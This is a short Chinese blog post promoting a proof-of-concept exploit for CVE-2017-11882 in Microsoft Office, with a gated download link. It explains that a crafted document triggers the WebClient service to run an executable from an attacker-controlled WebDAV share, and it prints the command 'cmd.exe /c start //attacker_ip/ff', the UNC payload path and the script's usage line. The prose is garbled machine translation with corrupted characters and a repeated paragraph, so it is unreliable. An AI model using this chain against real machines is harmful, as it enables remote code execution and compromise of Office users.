【CVE-2017-11882】漏洞POC 全版本通杀

  • A+
所属分类:颓废's Blog
摘要

这种利用触发器WebClient服务开始和从attacker-controlled WebDav执行远程文件服务��。这种方法可以方便的原因是一个限制执行命令的长度。然而WebDav的帮助下可以启动任意attacker-controlled脆弱的机器上执行。这个脚本创建简单的文档和几个OLE对象。这些对象利用cve – 2017 – 11882,在顺序命令执行结果

【CVE-2017-11882】漏洞POC 全版本通杀

这种利用触发器WebClient服务开始和从attacker-controlled WebDav执行远程文件服务��。这种方法可以方便的原因是一个限制执行命令的长度。然而WebDav的帮助下可以启动任意attacker-controlled脆弱的机器上执行。这个脚本创建简单的文档和几个OLE对象。这些对象利用cve - 2017 - 11882,在顺序命令执行结果

cmd.exe /c start //attacker_ip/ff

网络攻击者控制的二进制路径应该是一个UNC路径:

//attacker_ip/ff/1.exe

使用

webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

下载地址:

管理员设置 回复 可见隐藏内容

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: